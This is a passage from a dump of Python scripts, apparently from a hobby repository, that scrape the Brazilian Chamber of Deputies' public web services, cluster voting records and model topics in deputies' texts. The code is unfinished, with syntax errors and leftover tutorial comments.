codecs=['utf8', 'cp1252']):\r\n for i in codecs:\r\n try:\r\n return string.decode(i)\r\n except:\r\n pass\r\n\r\nif len(sys.argv) != 3:\r\n print('usage: python topics_extraction_with_nmf_lda.py text-deputados.txt list-deputados.txt')\r\n sys.exit()\r\n\r\nn_features = 1000\r\nn_topics = 20\r\nn_top_words = 10\r\n\r\n# lendo os dados dos deputados\r\ndep_file = open('info_deputados.csv', 'r', encoding='utf-8')\r\nlinha = dep_file.readline()\r\ndata_samples = linha.split(',')\r\n\r\n# calculando tf-idf\r\nprint(\"Extracting tf-idf features for NMF...\")\r\nsw = nltk.corpus.stopwords.words('portuguese')\r\ntfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, #max_features=n_features,\r\n stop_words=sw)\r\n\r\ndata = []\r\nfor x in data_samples:\r\n try:\r\n data.append(str(unicodedata.normalize('NFKD', force_decode(x)).encode('utf-8','ignore')))\r\n except:\r\n pass\r\n\r\n#data_samples = [str(unicodedata.normalize('NFKD', force_decode(x)).encode('utf-8','ignore')).encode('utf-8','ignore') for x in data_samples]\r\n\r\n#print(data_samples)\r\ntfidf = tfidf_vectorizer.fit_transform(data_samples)\r\ntf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, max_features=n_features,\r\n stop_words=sw)\r\ntf = tf_vectorizer.fit_transform(data_samples)\r\n\r\n\r\n# aplicando LDA. Escolher mais iterações quando for executar para valer\r\nnew_model = lda.LDA(n_topics=20, n_iter=30, random_state=1)\r\nnew_model.fit(tf)\r\n\r\n# imprimindo deputado e o tópico ao qual ele está mais relacionado. Aqui é\r\n# importante que você saiba quem é o deputado 0, o deputado 1 e assim por diante. \r\ndoc_topic = new_model.doc_topic_\r\n#for i in range(len(data_samples)):\r\n #print(\"deputado: {} (top topic: {})\".format(i, doc_topic[i].argmax()))\r\n\r\n#gerando vocab\r\nvocab = get_vocab(data_samples)\r\n\r\n# imprimindo o vocabulário de cada tópico\r\ntopic_word = new_model.topic_word_\r\n#for i, topic_dist in enumerate(topic_word):\r\n# topic_words = np.array(vocab)[np.argsort(topic_dist)][:-n_top_words:-1]\r\n #print('Topic {}: {}'.format(i, ' '.join(topic_words)))\r\n\r\n# lendo os deputados\r\ndep = open(sys.argv[2], 'r')\r\nlin = dep.readline()\r\ndata_deps = lin.split(',')\r\n\r\ndict_tags = {\r\n 0: \"construção, meiofios, calçados\",\r\n 1: \"esporte, arquitetura e autismo\",\r\n 2: \"esporte\",\r\n 3: \"educação\",\r\n 4: \"saúde, itapiranga, calçados\",\r\n 5: \"''\",\r\n 6: \"autismo, esporte, educação\",\r\n 7: \"política, agricultura\",\r\n 8: \"polícia, religião\",\r\n 9: \"autismo, esporte, jiujitsu, massagueira\",\r\n 10: \"agroturismo\",\r\n 11: \"educação, esporte\",\r\n 12: \"''\",\r\n 13: \"religião\",\r\n 14: \"portos\",\r\n 15: \"energia, construção, infraestrutura, autismo\",\r\n 16: \"mananciais, máquinas, escavadeiras\",\r\n 17: \"saúde, atendimentos, mucuriba\",\r\n 18: \"infraestrutura, elétrica, calçados\",\r\n 19: \"fenaporto, mucuri, pirapó\"\r\n}\r\n\r\nwith open('dep_temas.csv', 'w') as csvfile:\r\n fieldnames = ['Autor.id', 'TEMAS']\r\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\r\n writer.writeheader()\r\n for i in range(len(data_deps)):\r\n writer.writerow({'Autor.id': data_deps[i], 'TEMAS': dict_tags[doc_topic[i].argmax()]})" }, { "alpha_fraction": 0.6672069430351257, "alphanum_fraction": 0.6796326041221619, "avg_line_length": 34.97999954223633, "blob_id": "d198ef1eba0238587dce6107939a3561b0b18f2d", "content_id": "e38931983c2f9b890d7004e6e44c7823606e49fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1851, "license_type": "no_license", "max_line_length": 136, "num_lines": 50, "path": "/cluster_deputadoshistoricovotacoes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import pandas as pd\r\n# Read in the csv file\r\nvotes = pd.read_csv(\"votoprop.csv\")\r\n\r\n# As you can see, there are 100 senators, and they voted on 15 bills (we subtract 3 because the first 3 columns aren't bills).\r\nprint(votes.shape)\r\nvotes\r\n# We have more \"Yes\" votes than \"No\" votes overall\r\nprint(pd.value_counts(votes.iloc[:,1:].values.ravel()))\r\n\r\n########################################################\r\n\r\nimport pandas as pd\r\n\r\n# The kmeans algorithm is implemented in the scikits-learn library\r\nfrom sklearn.cluster import KMeans\r\n\r\n# Create a kmeans model on our data, using 2 clusters. random_state helps ensure that the algorithm returns the same results each time.\r\nkmeans_model = KMeans(n_clusters=4, random_state=1).fit(votes.iloc[:, 1:])\r\n\r\n# These are our fitted labels for clusters -- the first cluster has label 0, and the second has label 1.\r\nlabels = kmeans_model.labels_\r\n\r\n# The clustering looks pretty good!\r\n# It's separated everyone into parties just based on voting history\r\nprint(pd.crosstab(labels, votes[\"deputado\"]))\r\nlabels\r\n\r\n# Let's call these types of voters \"oddballs\" (why not?)\r\n# There aren't any republican oddballs\r\ndemocratic_oddballs = votes[(labels == 1) & (votes[\"party\"] == \"D\")]\r\n\r\n# It looks like Reid has abstained a lot, which changed his cluster.\r\n# Manchin seems like a genuine oddball voter.\r\nprint(democratic_oddballs[\"name\"])\r\n\r\n\r\n###################################################\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.decomposition import PCA\r\npca_2 = PCA(4)\r\n\r\n# Turn the vote data into two columns with PCA\r\nplot_columns = pca_2.fit_transform(votes.iloc[:,1:33])\r\n\r\n# Plot senators based on the two dimensions, and shade by cluster label\r\n# You can see the plot by clicking \"plots\" to the bottom right\r\nplt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=labels)\r\n\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.6725525856018066, "alphanum_fraction": 0.67392498254776, "avg_line_length": 64.0297622680664, "blob_id": "4aad2ffb5c6d0922f64af58b6f00a3c60b461a56", "content_id": "41180565a930926d410963fdb027bb6f3f011dfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10930, "license_type": "no_license", "max_line_length": 260, "num_lines": 168, "path": "/obterdados_deputados.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import urllib\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport urllib.request\nimport urllib.parse\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\nimport mysqldb\n\ndeputado_url = (\"http://www.camara.gov.br/SitCamaraWS/Deputados.asmx/\"\n \"ObterDeputados\")\n\n deputados = []\n with urllib.request.urlopen(deputado_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n idecadastro = item.find('ideCadastro').text,\n condicao = item.find('condicao').text,\n nome = item.find('nome').text,\n nomeParlamentar = item.find('nomeParlamentar').text,\n urlFoto = item.find('urlFoto').text,\n sexo = item.find('sexo').text,\n uf = item.find('uf').text,\n partido = item.find('partido').text,\n gabinete = item.find('gabinete').text,\n anexo = item.find('anexo').text,\n fone = item.find('fone').text,\n email = item.find('email').text\n deputados.append([idecadastro, condicao, nome, nomeParlamentar, urlFoto, sexo, uf, partido, gabinete, anexo, fone, email])\n\ndf = pd.DataFrame(deputados, columns = [\"idecadastro\", \"condicao\", \"nome\", \"nomeParlamentar\", \"urlFoto\", \"sexo\", \"uf\", \"partido\", \"gabinete\", \"anexo\", \"fone\", \"email\"])\n\ndetalhes = [] \npartido_atual = []\ngabinete = []\ncomissoes = []\ncargosComissoes = []\nperiodosExercicio = []\nhistoricoNomeParlamentar = []\nfiliacoesPartidarias = []\nhistoricoLider = []\n\nfor x in deputados:\n detalhes_url = (\"http://www.camara.gov.br/SitCamaraWS/Deputados.asmx/\"\n \"ObterDetalhesDeputado?%s\")\n\n params = urllib.parse.urlencode({\n 'ideCadastro': x[0][0],\n 'numLegislatura': 55})\n \n with urllib.request.urlopen(detalhes_url % params) as res:\n data = ET.fromstring(res.read())\n dep = data.find('Deputado')\n ideCadastro = dep.find('ideCadastro').text,\n email = dep.find('email').text,\n nomeProfissao = dep.find('nomeProfissao').text,\n dataNascimento = dep.find('dataNascimento').text,\n dataFalecimento = dep.find('dataFalecimento').text,\n ufRepresentacaoAtual = dep.find('ufRepresentacaoAtual').text,\n situacaoNaLegislaturaAtual = dep.find('situacaoNaLegislaturaAtual').text,\n nomeParlamentarAtual = dep.find('nomeParlamentarAtual').text,\n nomeCivil = dep.find('nomeCivil').text,\n sexo = dep.find('sexo').text\n detalhes.append([ideCadastro, email, nomeProfissao, dataNascimento, dataFalecimento, ufRepresentacaoAtual, situacaoNaLegislaturaAtual, nomeParlamentarAtual, nomeCivil, sexo])\n #montando o partidoAtual\n pta = dep.find('partidoAtual')\n idPartido = pta.find('idPartido').text,\n sigla = pta.find('sigla').text,\n nome = pta.find('nome').text\n partido_atual.append([ideCadastro, idPartido, sigla, nome])\n #montando os gabinetes\n for gbn in dep.findall('gabinete'):\n numero = gbn.find('numero').text,\n anexo = gbn.find('anexo').text,\n telefone = gbn.find('telefone').text\n gabinete.append([ideCadastro, numero, anexo, telefone])\n #montando as comissoes que o deputado participa\n for comissao in dep.find('comissoes'):\n idOrgaoLegislativoCD = comissao.find('idOrgaoLegislativoCD').text,\n siglaComissao = comissao.find('siglaComissao').text,\n nomeComissao = comissao.find('nomeComissao').text,\n condicaoMembro = comissao.find('condicaoMembro').text,\n dataEntrada = comissao.find('dataEntrada').text,\n dataSaida = comissao.find('dataSaida').text\n comissoes.append([ideCadastro, idOrgaoLegislativoCD, siglaComissao, nomeComissao, condicaoMembro, dataEntrada, dataSaida])\n #montando cargoComissoes\n cargos_comissoes = dep.find('cargosComissoes')\n for cargo in cargos_comissoes:\n idOrgaoLegislativoCD = cargo.find('idOrgaoLegislativoCD').text,\n siglaComissao = cargo.find('siglaComissao').text,\n nomeComissao = cargo.find('nomeComissao').text,\n idCargo = cargo.find('idCargo').text,\n nomeCargo = cargo.find('nomeCargo').text,\n dataEntrada = cargo.find('dataEntrada').text,\n dataSaida = cargo.find('dataSaida').text\n cargosComissoes.append([ideCadastro, idOrgaoLegislativoCD, siglaComissao, nomeComissao, idCargo, nomeCargo, dataEntrada, dataSaida ])\n #montando periodosExercicio\n periodos_exercicio = dep.find('periodosExercicio')\n for periodo in periodos_exercicio:\n siglaUFRepresentacao = periodo.find('siglaUFRepresentacao').text,\n situacaoExercicio = periodo.find('situacaoExercicio').text,\n dataInicio = periodo.find('dataInicio').text,\n dataFim = periodo.find('dataFim').text,\n idCausaFimExercicio = periodo.find('idCausaFimExercicio').text,\n descricaoCausaFimExercicio = periodo.find('descricaoCausaFimExercicio').text,\n idCadastroParlamentarAnterior = periodo.find('idCadastroParlamentarAnterior').text\n periodosExercicio.append([ideCadastro, siglaUFRepresentacao, situacaoExercicio, dataInicio, dataFim, idCausaFimExercicio, descricaoCausaFimExercicio, idCadastroParlamentarAnterior ])\n #montando historicoNomeParlamentar\n historico_nome = dep.find('historicoNomeParlamentar')\n for nome in historico_nome:\n nomeParlamentarAnterior = nome.find('nomeParlamentarAnterior').text,\n nomeParlamentaPosterior = nome.find('nomeParlamentaPosterior').text,\n dataInicioVigenciaNomePosterior = nome.find('dataInicioVigenciaNomePosterior').text\n historicoNomeParlamentar.append([ideCadastro, nomeParlamentarAnterior, nomeParlamentaPosterior, dataInicioVigenciaNomePosterior])\n #montando filiacoesPartidarias\n filiacoes = dep.find('filiacoesPartidarias')\n for filiacao in filiacoes:\n idPartidoAnterior = filiacao.find('idPartidoAnterior').text,\n siglaPartidoAnterior = filiacao.find('siglaPartidoAnterior').text,\n nomePartidoAnterior = filiacao.find('nomePartidoAnterior').text,\n idPartidoPosterior = filiacao.find('idPartidoPosterior').text,\n siglaPartidoPosterior = filiacao.find('siglaPartidoPosterior').text,\n nomePartidoPosterior = filiacao.find('nomePartidoPosterior').text,\n dataFiliacaoPartidoPosterior = filiacao.find('dataFiliacaoPartidoPosterior').text\n filiacoesPartidarias.append([ideCadastro, idPartidoAnterior, siglaPartidoAnterior, nomePartidoAnterior, idPartidoPosterior, siglaPartidoPosterior, nomePartidoPosterior, dataFiliacaoPartidoPosterior])\n #montando historicoLideranca\n historico_lider = dep.find('historicoLider')\n for lider in historico_lider:\n idHistoricoLider = lider.find('idHistoricoLider').text,\n idCargoLideranca = lider.find('idCargoLideranca').text,\n descricaoCargoLideranca = lider.find('descricaoCargoLideranca').text,\n numOrdemCargo = lider.find('numOrdemCargo').text,\n dataDesignacao = lider.find('dataDesignacao').text,\n dataTermino = lider.find('dataTermino').text,\n codigoUnidadeLideranca = lider.find('codigoUnidadeLideranca').text,\n siglaUnidadeLideranca = lider.find('siglaUnidadeLideranca').text,\n idBlocoPartido = lider.find('idBlocoPartido').text\n historicoLider.append([ideCadastro, idHistoricoLider, idCargoLideranca, descricaoCargoLideranca, numOrdemCargo, dataDesignacao, dataTermino, codigoUnidadeLideranca, siglaUnidadeLideranca, idBlocoPartido])\n\n\ndf_detalhes = pd.DataFrame(detalhes, columns = [\"ideCadastro\", \"email\", \"nomeProfissao\", \"dataNascimento\", \"dataFalecimento\", \"ufRepresentacaoAtual\", \"situacaoNaLegislaturaAtual\", \"nomeParlamentarAtual\", \"nomeCivil\", \"sexo\" ])\ndf_partidoatual = pd.DataFrame(partido_atual, columns=[\"ideCadastro\", \"idPartido\", \"sigla\", \"nome\"])\ndf_gabinete = pd.DataFrame(gabinete, columns=[\"ideCadastro\", \"numero\", \"anexo\", \"telefone\"])\ndf_comissoes = pd.DataFrame(comissoes , columns=[\"ideCadastro\", \"idOrgaoLegislativoCD\", \"siglaComissao\", \"nomeComissao\", \"condicaoMembro\", \"dataEntrada\", \"dataSaida\"])\ndf_cargosComissoes = pd.DataFrame(cargosComissoes , columns=[\"ideCadastro\", \"idOrgaoLegislativoCD\", \"siglaComissao\", \"nomeComissao\", \"idCargo\", \"nomeCargo\", \"dataEntrada\", \"dataSaida\"])\ndf_periodosExercicio = pd.DataFrame(periodosExercicio , columns=[\"ideCadastro\", \"siglaUFRepresentacao\", \"situacaoExercicio\", \"dataInicio\", \"dataFim\", \"idCausaFimExercicio\", \"descricaoCausaFimExercicio\", \"idCadastroParlamentarAnterior\"])\ndf_historicoNomeParlamentar = pd.DataFrame(historicoNomeParlamentar , columns=[\"ideCadastro\", \"nomeParlamentarAnterior\", \"nomeParlamentaPosterior\", \"dataInicioVigenciaNomePosterior\"])\ndf_filiacoesPartidarias = pd.DataFrame(filiacoesPartidarias , columns=[\"ideCadastro\", \"idPartidoAnterior\", \"siglaPartidoAnterior\", \"nomePartidoAnterior\", \"idPartidoPosterior\", \"siglaPartidoPosterior\", \"nomePartidoPosterior\", \"dataFiliacaoPartidoPosterior\"])\ndf_historicoLider = pd.DataFrame(historicoLider , columns=[\"ideCadastro\", \"idHistoricoLider\", \"idCargoLideranca\", \"descricaoCargoLideranca\", \"numOrdemCargo\", \"dataDesignacao\", \"dataTermino\", \"codigoUnidadeLideranca\", \"siglaUnidadeLideranca\", \"idBlocoPartido\"])\n\n\nengine = create_engine('mysql+pymysql://root:@127.0.0.1:3306/camara?charset=utf8', echo=False)\n###########\ndf.to_sql(name='deputado', con=engine, if_exists='replace')\ndf_detalhes.to_sql(name='detalhes', con=engine, if_exists='replace')\ndf_partidoatual.to_sql(name='partidoatual', con=engine, if_exists='replace')\ndf_gabinete.to_sql(name='gabinete', con=engine, if_exists='replace')\ndf_comissoes.to_sql(name='comissoes', con=engine, if_exists='replace')\ndf_cargosComissoes.to_sql(name='cargosComissoes', con=engine, if_exists='replace')\ndf_periodosExercicio.to_sql(name='periodosExercicio', con=engine, if_exists='replace')\ndf_historicoNomeParlamentar.to_sql(name='historicoNomeParlamentar', con=engine, if_exists='replace')\ndf_filiacoesPartidarias.to_sql(name='filiacoesPartidarias', con=engine, if_exists='replace')\ndf_historicoLider.to_sql(name='historicoLider', con=engine, if_exists='replace')\n###########\nconn.close()\n\n\n\n\n\n" }, { "alpha_fraction": 0.628579318523407, "alphanum_fraction": 0.6351872086524963, "avg_line_length": 50.514286041259766, "blob_id": "cb5a6c57171a8866eae88726d301deae250f3b5b", "content_id": "dfc899766a6e1f254873c99bba31e657f712a96e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3632, "license_type": "no_license", "max_line_length": 188, "num_lines": 70, "path": "/obter_SessoesReunioes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import urllib\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport urllib.request\nimport urllib.parse\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\nimport mysqldb\n\nsessoesreunioes_url = (\"http://www.camara.gov.br/sitcamaraws/SessoesReunioes.asmx/\"\n \"ListarDiscursosPlenario?dataIni=16/11/2016&dataFim=16/11/2016&codigoSessao=&parteNomeParlamentar=&siglaPartido=&siglaUF=\")\n \n \nsessoesreunioes = []\nfasesSessao = []\ndiscursosSessao = []\nwith urllib.request.urlopen(sessoesreunioes_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n Scodigo = item.find('codigo').text,\n data = item.find('data').text,\n numero = item.find('numero').text,\n tipo = item.find('tipo').text\n sessoesreunioes.append([Scodigo, data, numero, tipo])\n for gbn in item.findall('fasesSessao'):\n for fs in gbn.findall('faseSessao'):\n Fcodigo = fs.find('codigo').text,\n descricao = fs.find('descricao').text\n fasesSessao.append([Scodigo,Fcodigo, descricao])\n for ds in fs.findall('discursos'):\n for discurso in ds.findall('discurso'):\n for ora in discurso.findall('orador'):\n numero = ora.find('numero').text,\n nome = ora.find('nome').text\n horaInicioDiscurso = discurso.find('horaInicioDiscurso').text,\n txtIndexacao = discurso.find('txtIndexacao').text,\n numeroQuarto = discurso.find('numeroQuarto').text, \n numeroInsercao = discurso.find('numeroInsercao').text,\n sumario = discurso.find('sumario').text\n discursosSessao.append([Scodigo,Fcodigo, numero, nome, horaInicioDiscurso, txtIndexacao, numeroQuarto, numeroInsercao, sumario])\n\nsessoesreunioes_df = pd.DataFrame(sessoesreunioes, columns = [\"Scodigo\", \"data\", \"numero\", \"tipo\"])\nfasesSessao_df = pd.DataFrame(fasesSessao, columns = [\"Scodigo\", \"Fcodigo\", \"descricao\"])\ndiscursosSessao_df = pd.DataFrame(discursosSessao, columns = [\"Scodigo\",\"Fcodigo\", \"numero\", \"nome\", \"horaInicioDiscurso\", \"txtIndexacao\", \"numeroQuarto\", \"numeroInsercao\", \"sumario\"])\n\n\nListarPresencasDia_url = (\"http://www.camara.leg.br/SitCamaraWS/sessoesreunioes.asmx/\"\n \"ListarPresencasDia?data=23/11/2016&numLegislatura=&numMatriculaParlamentar=&siglaPartido=&siglaUF=\")\n\nListarPresencasDia = []\nwith urllib.request.urlopen(ListarPresencasDia_url) as res:\n data = ET.fromstring(res.read())\n\nfor item in data:\n for par in item:\n carteiraParlamentar = par.find('carteiraParlamentar').text,\n descricaoFrequenciaDia = par.find('descricaoFrequenciaDia').text,\n justificativa = par.find('justificativa').text,\n presencaExterna = par.find('presencaExterna').text,\n for se in par:\n for sed in se:\n inicio = sed.find('inicio').text,\n descricao = sed.find('descricao').text,\n frequencia = sed.find('frequencia').text\n ListarPresencasDia.append([carteiraParlamentar, descricaoFrequenciaDia, justificativa, presencaExterna, inicio, descricao, frequencia])\n \nListarPresencasDia_df = pd.DataFrame(ListarPresencasDia, columns=[\"carteiraParlamentar\", \"descricaoFrequenciaDia\", \"justificativa\", \"presencaExterna\", \"inicio\", \"descricao\", \"frequencia\"])\n\n\n\n\n\n \n" }, { "alpha_fraction": 0.5923113226890564, "alphanum_fraction": 0.5952539443969727, "avg_line_length": 40.15234375, "blob_id": "c158e1d7b5f9df4c54c74877767315392ac8fba9", "content_id": "378465a221c39909b65d767faac0eaa532705043", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10576, "license_type": "no_license", "max_line_length": 191, "num_lines": 256, "path": "/obter_proposicoes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import urllib\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport urllib.request\nimport urllib.parse\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\nimport mysqldb\n\nsiglas_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarSiglasTipoProposicao\")\nsiglas = []\n\nwith urllib.request.urlopen(siglas_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n tipoSigla = item.get('tipoSigla'),\n descricao = item.get('descricao'),\n ativa = item.get('ativa'),\n genero = item.get('genero')\n siglas.append([tipoSigla, descricao, ativa, genero])\n\nsiglas_df = pd.DataFrame(siglas, columns=[\"tipoSigla\", \"descricao\", \"ativa\", \"genero\"])\n\n\n\"\"\"Obtém a lista de situações para proposições.\"\"\"\nsituacoes_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarSituacoesProposicao\")\n\nsituacoes = []\nwith urllib.request.urlopen(situacoes_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n id = item.get('id'),\n descricao = item.get('descricao'),\n ativa = item.get('ativa')\n situacoes.append([id, descricao, ativa])\n\nsituacoes_df = pd.DataFrame(situacoes, columns=[\"id\", \"descricao\", \"ativa\"]) \n\n\ndef obter_tipos_autores():\n \"\"\"Obtém a lista de tipos de autores das proposições.\"\"\"\n tipos_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarTiposAutores\")\n tipos = []\n with urllib.request.urlopen(tipos_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n id = item.get('id'),\n descricao = item.get('descricao')\n tipos.append([id, descricao])\n \n tipos_df = pd.DataFrame(tipos, columns=[\"id\", \"descricao\"]) \n return tipos_df\n\ntipos_df = obter_tipos_autores()\n\n\ndef monta_proposicao(item):\n \"\"\"\n Monta as proposições recuperadas em data.\n Args:\n item (ElementTree): ElementTree de uma proposição do xml da camara.\n Return:\n prop (Proposicao): proposição.\n \"\"\"\n prop_det_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ObterProposicaoPorID?%s\")\n prop = Proposicao(\n item.find('id').text,\n item.find('nome').text,\n item.find('numero').text,\n item.find('ano').text,\n item.find('datApresentacao').text,\n item.find('txtEmenta').text,\n item.find('txtExplicacaoEmenta').text,\n item.find('qtdAutores').text,\n item.find('indGenero').text,\n item.find('qtdOrgaosComEstado').text)\n\n #setando o tipo de proposicao\n tipo_prop = item.find('tipoProposicao')\n prop.set_tipo_proposicao(TipoProposicao(\n tipo_prop.find('id').text,\n tipo_prop.find('sigla').text,\n tipo_prop.find('nome').text))\n\n #setando o orgao numerador\n orgao_num = item.find('orgaoNumerador')\n prop.set_orgao_numerador(OrgaoNumerador(\n orgao_num.find('id').text,\n orgao_num.find('sigla').text,\n orgao_num.find('nome').text))\n\n #setando o regime\n regime = item.find('regime')\n prop.set_regime(Regime(\n regime.find('codRegime').text,\n regime.find('txtRegime').text))\n\n #setando a apreciacao\n apre = item.find('apreciacao')\n prop.set_apreciacao(Apreciacao(\n apre.find('id').text,\n apre.find('txtApreciacao').text))\n\n #setando autor1\n autor1 = item.find('autor1')\n prop.set_autor1(Autor(\n autor1.find('txtNomeAutor').text,\n autor1.find('idecadastro').text,\n autor1.find('codPartido').text,\n autor1.find('txtSiglaPartido').text,\n autor1.find('txtSiglaUF').text))\n\n #setando o último despacho\n ult_des = item.find('ultimoDespacho')\n prop.set_ultimo_despacho(UltimoDespacho(\n ult_des.find('datDespacho').text,\n ult_des.find('txtDespacho').text))\n\n #setando situacao\n sit = item.find('situacao')\n sit_prop = SituacaoProposicao(sit.find('id').text,\n sit.find('descricao').text)\n org = sit.find('orgao')\n orgao = Orgao(org.find('codOrgaoEstado').text,\n org.find('siglaOrgaoEstado').text)\n sit_prop.set_orgao(orgao)\n\n principal = sit.find('principal')\n princ = {\n 'cod_prop_principal':\n principal.find('codProposicaoPrincipal').text,\n 'prop_principal':\n principal.find('proposicaoPrincipal').text}\n sit_prop.set_prop_principal(princ)\n prop.set_situacao(sit_prop)\n\n params_det = urllib.parse.urlencode({'IdProp': prop.id_})\n with urllib.request.urlopen(prop_det_url % params_det) as res_d:\n detalhes = ET.fromstring(res_d.read())\n prop.set_tema(detalhes.find('tema').text)\n prop.set_indexacao(\n detalhes.find('Indexacao').text.split(','))\n prop.set_link_inteiro_teor(\n detalhes.find('LinkInteiroTeor').text)\n apensadas = detalhes.find('apensadas')\n for apensada in apensadas:\n apens = (apensada.find('nomeProposicao').text,\\\n apensada.find('codProposicao').text)\n prop.add_apensada(apens)\n\n return prop\n\ndef obter_proposicoes(sigla, anos):\n \"\"\"Obtém a lista de proposições que satisfaçam os argumentos.\n Args:\n sigla (str) - Padrão 'PL'\n anos (list) - Lista dos anos. Padrão [2011].\n apensadas (boolean) - Se deve ou não buscar as proposições apensadas.\n siglas (list) - lista dos tipos para buscas as proposições apensadas.\n \"\"\"\n prop_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarProposicoes?numero=&datApresentacaoIni=&\"\n \"datApresentacaoFim=&idTipoAutor=&parteNomeAutor=&\"\n \"siglaPartidoAutor=&siglaUFAutor=&generoAutor=&\"\n \"codEstado=&codOrgaoEstado=&emTramitacao=&%s\")\n \n props = []\n numeros = []\n params = urllib.parse.urlencode({'sigla': 'PL', 'ano': 2016})\n with urllib.request.urlopen(prop_url % params) as res:\n data = ET.fromstring(res.read())\n for item in data:\n id = item.find('id').text,\n nome = item.find('nome').text,\n numero = item.find('numero').text,\n ano = item.find('ano').text\n for tipo in item.findall('tipoProposicao'):\n tiposigla = tipo.find('sigla').text\n for orgao in item.findall('orgaoNumerador'):\n orgaosigla = orgao.find('sigla').text\n datApresentacao = item.find('datApresentacao').text,\n txtEmenta = item.find('txtEmenta').text\n for regime in item.findall('regime'):\n codRegime = regime.find('codRegime').text , \n txtRegime = regime.find('txtRegime').text\n for apreciacao in item.findall('apreciacao'):\n txtApreciacao = apreciacao.find('txtApreciacao').text\n for autor1 in item.findall('autor1'):\n txtNomeAutor = autor1.find('txtNomeAutor').text \n idecadastro = autor1.find('idecadastro').text\n codPartido = autor1.find('codPartido').text \n txtSiglaPartido = autor1.find('txtSiglaPartido').text\n txtSiglaUF = autor1.find('txtSiglaUF').text \n for ultimoDespacho in item.findall('ultimoDespacho'):\n datDespacho = ultimoDespacho.find('datDespacho').text, \n txtDespacho = ultimoDespacho.find('txtDespacho').text\n for situacao in item.findall('situacao'):\n situacaodescricao = situacao.find('descricao').text\n for orgao in situacao.findall('orgao'):\n siglaOrgaoEstado = orgao.find('siglaOrgaoEstado').text \n for principal in situacao.findall('principal'):\n proposicaoPrincipal = principal.find('proposicaoPrincipal').text \n props.append([id, nome, numero, ano, tiposigla, orgaosigla, datApresentacao, txtEmenta, codRegime, txtRegime, txtApreciacao, txtNomeAutor, \n idecadastro, codPartido, txtSiglaPartido, txtSiglaUF, datDespacho, txtDespacho, situacaodescricao, siglaOrgaoEstado, proposicaoPrincipal ])\n\nprops_df = pd.DataFrame(props, columns=[\"id\", \"nome\", \"numero\", \"ano\", \"tiposigla\", \"orgaosigla\", \"datApresentacao\", \"txtEmenta\", \"codRegime\", \"txtRegime\", \"txtApreciacao\", \"txtNomeAutor\", \n \"idecadastro\", \"codPartido\", \"txtSiglaPartido\", \"txtSiglaUF\", \"datDespacho\", \"txtDespacho\", \"situacaodescricao\", \"siglaOrgaoEstado\", \"proposicaoPrincipal\"]) \n\nprops_df.\n\ndef obter_apensadas(apensadas, numeros):\n \"\"\"\n Método que obtem as proposições apensadas de prop.\n Args:\n apensadas (list): lista de apensadas para baixar.\n numeros (list): número das proposições que já foram baixadas.\n Return:\n props (list): lista das proposicoes apensadas de prop.\n \"\"\"\n prop_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarProposicoes?datApresentacaoIni=&\"\n \"datApresentacaoFim=&idTipoAutor=&parteNomeAutor=&\"\n \"siglaPartidoAutor=&siglaUFAutor=&generoAutor=&\"\n \"codEstado=&codOrgaoEstado=&emTramitacao=&%s\")\n props = []\n for nome, _ in apensadas:\n #recupera a sigla para a busca\n sigla = nome.split() #a sigla mesmo é o elemento 0\n numero = sigla[1][:sigla[1].find('/')] #tudo antes da /\n ano = sigla[1][-4:] #4 últimos dígitos\n\n #se a proposição já foi baixada, não baixar novamente\n if numero in numeros:\n continue\n params = urllib.parse.urlencode({'sigla': sigla[0],\n 'numero': numero,\n 'ano': ano})\n with urllib.request.urlopen(prop_url % params) as res:\n data = ET.fromstring(res.read())\n #se não retornou nada, continua\n if data.tag == 'erro':\n continue\n prop = monta_proposicao(data.find('proposicao'))\n props.append(prop)\n print('\\tAPENSADA: {} - {} {} (id: {})'.format(len(props),\n prop.nome,\n prop.ano,\n prop.id_))\n return props\n" }, { "alpha_fraction": 0.6435832381248474, "alphanum_fraction": 0.6518424153327942, "avg_line_length": 33.19565200805664, "blob_id": "6d93aad042cc1837640686edbba31b65837ab4fe", "content_id": "b997967a6be0be482648f7a1e9df84bb54585412", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1579, "license_type": "no_license", "max_line_length": 86, "num_lines": 46, "path": "/obter_historico_votacoes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import 